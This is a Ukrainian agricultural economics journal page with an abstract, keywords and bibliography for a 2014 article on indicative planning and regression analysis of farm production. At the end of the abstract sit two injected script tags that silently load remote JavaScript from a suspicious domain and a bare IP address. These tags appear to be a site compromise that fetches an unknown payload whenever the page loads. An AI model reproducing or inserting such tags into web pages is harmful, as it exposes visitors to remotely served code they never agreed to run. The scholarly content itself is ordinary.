ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 338.436
Економіка агропромислового виробництва

Прогнозування конкурентоспроможного розвитку аграрного виробництва на основі індикативного планування / Одінцов М. М., Одінцов О.М. // Економіка АПК. - 2014. - № 8 - С. 13

Управління аграрною економікою на основі індикативного планування передбачає розробку і застосування системи індикаторів впливу на процеси підвищення конкурентоспроможності галузі, забезпечення стійкості продовольчої безпеки країни. Пропонована методика аналізу структури валової продукції сільського господарства в розрізі областей та районів на основі коефіцієнтів регресії дає можливість виявляти спеціалізацію територіальних виробничих утворень і основні види сільськогосподарської продукції, що формують основу аграрного виробництва даної природно-сільськогосподарської зони. Виявлена залежність інтенсивності ведення сільськогосподарського виробництва від щільності поголів'я корів на 100 га ріллі й необхідної площі вирощування кормових культур стає основою індикативного планування конкурентоспроможного функціонування сільськогосподарських підприємств на середньострокову перспективу. Табл.: 4. Бібліогр.: 16.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: аграрне виробництво, ефективність, інтенсивність, індикативне планування, прогнозування, стратегія, управління, регресійний аналіз, фактор, конкурентоспроможність

Список використаних джерел

 1. Постанова Кабінету Міністрів України «Про затвердження Державної цільової програми розвитку села на період до 2015 року» № 1158 від 18 вересня 2007 р.
 2. Стратегія розвитку аграрного сектору економіки на період до 2020 року. Розпорядження Кабінету Міністрів України від 17 жовтня 2013 р. № 806-р.
 3. Йохансен Л. Очерки макроэкономического планирования/ Л. Йохансен; пер. с англ. В 2-х томах. Т. 2. − М.: «Прогресс», 1982. − 472 с.
 4. Иванов Е. Индикативное планирование развития экономики / Е. Иванов // Экономист. − 1993. − № 9. − С. 3 − 9.
 5. Цзиньвэнь Ли. Роль государственного регулирования в экономике Китая / Ли Цзиньвэнь // Вопросы экономики. − 1997. − № 7. − С. 156 − 159.
 6. Евграшин А. Из практики французского индикативного планирования / А. Евграшин // Российский экономический журнал. − 1998. − № 2. − С. 84 − 87.
 7. Konichi T. Planning National Consensus / T. Konichi // Work in Busines United Nations University. − Tokyo. − 1987. − Vol. 10 (may).
 8. Гейко Л.М. Державне регулювання економіки : навч. посі­б. / Л.М. Гейко, В.П. Марущак. − О., 2006. − 110 с.
 9. Швайка Л.А. Державне регулювання економіки : навч. посіб. / Л.А. Швайка. − К.: «Знання», 2006. − 436 с.
 10. Delorm R. Elat et L'economie / R. Delorm, Cr. L. Andre. − Paris: Ed. Senit, 1993.
 11. Quinet E. La planification francaise / E. Quinet. − Paris: PUF, 1990.
 12. Gruson C. Origines et espoirs de la planification francaise / C. Gruson. − Paris, 1968.
 13. Konichi T. Planning Through National Consensus / T. Konichi // Work in Business United University. Tokyo. − 1987. − Vol. 10.
 14. Воскобойников Ю.Е. Регрессионный анализ данных в пакете Mathcad : учеб. пособие / Ю.Е. Воскобойников. − СПб.: Изд. «Лань», 2011. − 224 с.
 15. Постанова Кабінету міністрів України від 11 лютого 2010 р. № 165 «Про затвердження нормативів оптимального співвідношення культур у сівозмінах в різних природно-сільськогосподарських регіонах».
 16. Гноєвий І.В. Годівля і відтворення поголів’я сільськогосподарських тва­рин в Україні : моногр. / І.В. Гноєвий / ІТ УААН, ХДЗВА. − Харків, Магда LTD, 2006. − C. 367−396.
Читати статтю: 14_08_13-20.pdf
Читати переклад статті: 1408odintsov_odintsov.pdf